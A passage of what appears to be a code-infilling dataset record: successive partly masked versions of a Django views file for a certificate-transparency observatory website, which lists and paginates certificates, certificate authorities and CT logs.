int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef list_cn_certs(request, cn):\n field_id = 'common name'\n expression = cn\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [cn])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\n<mask token>\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef list_cn_certs(request, cn):\n field_id = 'common name'\n expression = cn\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [cn])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef flag(request, flag_id):\n try:\n with open(os.path.join(BASE_DIR, 'static/flags/png/{0}.png'.format(\n flag_id.lower())), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n except IOError:\n with open(os.path.join(BASE_DIR, 'static/flags/png/-.png'), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n\n\n<mask token>\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef list_cn_certs(request, cn):\n field_id = 'common name'\n expression = cn\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [cn])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef flag(request, flag_id):\n try:\n with open(os.path.join(BASE_DIR, 'static/flags/png/{0}.png'.format(\n flag_id.lower())), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n except IOError:\n with open(os.path.join(BASE_DIR, 'static/flags/png/-.png'), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n\n\ndef imprint(request):\n return render(request, 'observer/imprint.html')\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-5": "from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom django.db.models import Count\nfrom django.db.models import QuerySet\nfrom django.db import connection\nfrom django.core.paginator import Paginator, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.http import HttpResponsePermanentRedirect\nimport datetime\nimport os\nimport json\nfrom ctobservatory.settings import BASE_DIR\nfrom .models import *\nfrom notification.forms import SubscribeUnsubscribeForm\n#from .issuefinder import *\nimport observer.issuefinder as issuefinder\nfrom django.template.defaulttags import register\nimport hashlib\nimport psycopg2\nITEMS_PER_PAGE = 50\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\nclass FastCountQuerySet():\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute(\"SELECT reltuples FROM pg_class WHERE relname = %s\", [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n # passthrough all the other methods\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n \n def __getitem__(self, item):\n return self.queryset[item]\n\nclass MetadataCountQuerySet():\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute(\"SELECT name_value FROM metadata WHERE name_type = %s\", [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n # passthrough all the other methods\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n \n def __getitem__(self, key):\n return self.queryset[key]\n \n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n \n messages = []\n if('subok' in request.GET):\n messages.append({'class':'alert-info','text':'<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'})\n if('unsubok' in request.GET):\n messages.append({'class':'alert-info','text':'<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'})\n \n subscribeform = 